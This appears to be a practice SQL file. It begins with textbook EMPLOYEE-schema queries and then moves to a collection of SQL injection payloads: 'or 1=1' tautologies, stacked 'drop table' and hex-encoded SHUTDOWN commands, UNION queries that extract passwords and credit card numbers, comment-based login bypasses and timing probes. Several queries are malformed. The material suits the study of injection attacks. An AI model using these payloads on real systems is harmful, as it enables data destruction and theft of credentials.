select Fname, Lname, Ssn
from EMPLOYEE
where Dno = 4;

select Fname, Lname, Ssn
from EMPLOYEE,
where Salary > 30000;

select Fname, Lname, Ssn
from EMPLOYEE
where Dno=5 and Sex='M';

select Dname
from EMPLOYEE, DEPARTMENT
where Dno=Dnumber
group by Dname
having avg(Salary)>30000;

select Fname, Lname
from EMPLOYEE
where Dno = (select Dno
from EMPLOYEE
where Salary = (select max(Salary)
from EMPLOYEE));

select Fname, Lname, Ssn
from EMPLOYEE
where Dno=5 or 1=1;

select Fname, Lname, Ssn
from EMPLOYEE
where Dno=5 and Sex='M' or 1=1;

select Fname, Lname
from EMPLOYEE
where Dno=5  '; drop table EMPLOYEE';

select Fname, Lname, Ssn
from EMPLOYEE,
where Salary > 30000 ';SHUTDOWN; -- ';

select Fname, Lname
from EMPLOYEE
where Salary > 15000
UNION ALL
select Ssn
from EMPLOYEE;

select *
from EMPLOYEE
where userid = 'abcd' and password = ''; drop table xyz -- '

SELECT supplier_id, supplier_name
FROM suppliers
WHERE state = 'California'
UNION ALL
SELECT company_id, company_name
FROM companies
WHERE company_id > 1000
ORDER BY 2;

SELECT name, description, price
FROM products
WHERE category=1 UNION SELECT 'A', 'B', 3

SELECT name, description, price
FROM products
WHERE category=1
UNION
SELECT 1
FROM information_schema.tables

SELECT name, description, price
FROM products
WHERE category=1
UNION
SELECT 1
FROM all_tables

SELECT description
FROM products
WHERE name ='z' AND 'a'='b'
UNION
SELECT password
FROM members
WHERE username='admin'

SELECT name, description, price
FROM products
WHERE category=1
ORDER BY 2

SELECT name, description, price
FROM products
WHERE id=1
ORDER BY 4

SELECT name, description, price
FROM products
WHERE category=1
UNION
SELECT 'A','B', 3
FROM all_tables

SELECT name, description, price
FROM products
WHERE category=1 AND 1=2
UNION
SELECT username, password, 1
FROM members

SELECT count(*)
FROM information_schema.columns A, information_schema.columns B, information_schema.columns C

SELECT *
FROM products
WHERE id=1 AND 1>(SELECT count(*)
FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)

SELECT title, content
FROM posts
WHERE page='xyz')

SELECT title, content
FROM posts
WHERE page='dogs' AND 'a'='a

SELECT title, content
FROM posts
WHERE page='dogs' AND 'a'='b'

SELECT title, content
FROM posts
WHERE topic='do' 'gs'

SELECT *
FROM users
WHERE username='"..$_POST['username']."' AND password='".$_POST['password']."'"

SELECT *
FROM users
WHERE username='admin' AND password='wrongpassword' OR 'a'='a'

SELECT *
FROM users
WHERE username='admin' -- AND password='anyPassword

select Fname, Lname, Ssn
from EMPLOYEE
where Dno=5 or 1+1+1=3;

select Fname, Lname, Ssn
from EMPLOYEE
where Dno=5 or 1+1+1+1+1+1=6;

select Fname, Lname, Ssn
from EMPLOYEE
where Dno = char(0x45ef);

select Fname, Lname, Ssn
from EMPLOYEE
where Dno = 0xffe;

select Fname, Lname, Ssn
from EMPLOYEE
where Dno = U+176e;

select Fname, Lname, Ssn
from EMPLOYEE
where Dno = char(u+0021);

SELECT *
FROM users
WHERE login= '' AND pass=' ';exec(char(0x73687574646f776e)) '

SELECT *
FROM users
WHERE login= '' AND pass=' ';char(0x73687574646f776e) '

SELECT name, description, price
FROM products
WHERE category=1 UNION SELECT 'A','C', 3 FROM all_tables

SELECT Name, Phone
FROM User
WHERE Id=1 UNION ALL SELECT creditCardNumber, 1 FROM CreditCarTable

SELECT name, email
FROM members
WHERE id=1; IF SYSTEM_USER='sa' SELECT 1/0
ELSE SELECT 5

SELECT name, email
FROM members
WHERE id=1; IF SYSTEM_USER='sa' SELECT 1/0
THEN SELECT 5

SELECT NAME,ID
FROM SYSOBJECTS
WHERE NAME = 0x7300790073006F0062006A006500630074;

SELECT name, email
FROM members
WHERE id=1 AND SYSTEM_USER='sa' THEN SELECT 1/0
ELSE SELECT 5;